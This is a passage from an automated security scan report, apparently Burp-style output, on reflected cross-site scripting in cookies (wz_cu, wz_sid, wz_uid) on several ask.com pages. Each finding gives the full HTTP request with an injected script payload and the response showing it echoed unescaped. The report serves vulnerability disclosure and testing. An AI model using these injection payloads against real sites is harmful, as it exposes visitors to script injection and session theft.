Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=06aabe"><script>alert(1)</script>5f5b1f54996; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:12:39 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjM5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:39 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:39 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118575


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c4075&p=ja-question&rf=0&ord=6588919&wz_cu=06aabe"><script>alert(1)</script>5f5b1f54996" height=1 width=1 id="SessionTracker" />
...[SNIP]...
1.18. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_sid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 448cb'-alert(1)-'938aa2c9db6 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3448cb'-alert(1)-'938aa2c9db6

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:13:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEzOjM3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:37 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:37 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118258


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F3448cb'-alert(1)-'938aa2c9db6;u3=0;u2=;ord=-628091965?" width="1" height="1" frameborder="0">
...[SNIP]...
1.19. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b8a6'-alert(1)-'f2ed5ba8a49 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F37b8a6'-alert(1)-'f2ed5ba8a49; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:13:12 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:11 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F37b8a6'-alert(1)-'f2ed5ba8a49;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-201217928?" width="1" height="1" frameborder="0">
...[SNIP]...
1.20. http://www.ask.com/ja-ask-dialog [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4794"-alert(1)-"74436131dfe was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0b4794"-alert(1)-"74436131dfe; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/
Content-Length: 69091



...[SNIP]...
JASK.ask_dialog = JASK.ask_dialog(JASK.ask_dialog,{
"sessionTracker1":"http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=jaq&l=dir&o=0&ld=5489&sv=0a5c404e&p=ja-ask-dialog&rf=0&ord=3573624&wz_cu=0b4794"-alert(1)-"74436131dfe",
"sessionTracker2":"http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=jaq&l=dir&o=0&ld=5489&sv=0a5c404e&p=ja-ask-dialog&rf=0&ord=3573624&wz_cu=0b4794"-alert(1)-"74436131dfe",
"sessi
...[SNIP]...
1.21. http://www.ask.com/pictures [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6902"><script>alert(1)</script>42fb11faf5 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0a6902"><script>alert(1)</script>42fb11faf5; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:10:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:26 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106893


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&l=dir&o=0&ld=5489&sv=0a5c4050&p=pictures&rf=0&ord=521318&wz_cu=0a6902"><script>alert(1)</script>42fb11faf5" height=1 width=1 id="SessionTracker" />
...[SNIP]...
1.22. http://www.ask.com/pictures [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71745"-alert(1)-"e6b3eee7903 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=071745"-alert(1)-"e6b3eee7903; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:10:28 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106727


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&l=dir&o=0&ld=5489&sv=0a5c4050&p=pictures&rf=0&ord=5338033&wz_cu=071745"-alert(1)-"e6b3eee7903";


</script>
...[SNIP]...
1.23. http://www.ask.com/pictures [wz_sid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f7de'-alert(1)-'a5bf6391ec6 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F35f7de'-alert(1)-'a5bf6391ec6; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:10:48 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjQ4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:48 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:48 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106418


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F35f7de'-alert(1)-'a5bf6391ec6;u3=0;u2=;ord=-313947270?" width="1" height="1" frameborder="0">
...[SNIP]...
1.24. http://www.ask.com/pictures [wz_uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df97a'-alert(1)-'a1578735830 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3df97a'-alert(1)-'a1578735830; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:10:37 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjM2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:36 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106419


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3df97a'-alert(1)-'a1578735830;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-1116380978?" width="1" height="1" frameborder="0">
...[SNIP]...
1.25. http://www.ask.com/pictureslanding [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284b6"-alert(1)-"2961042f29c was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
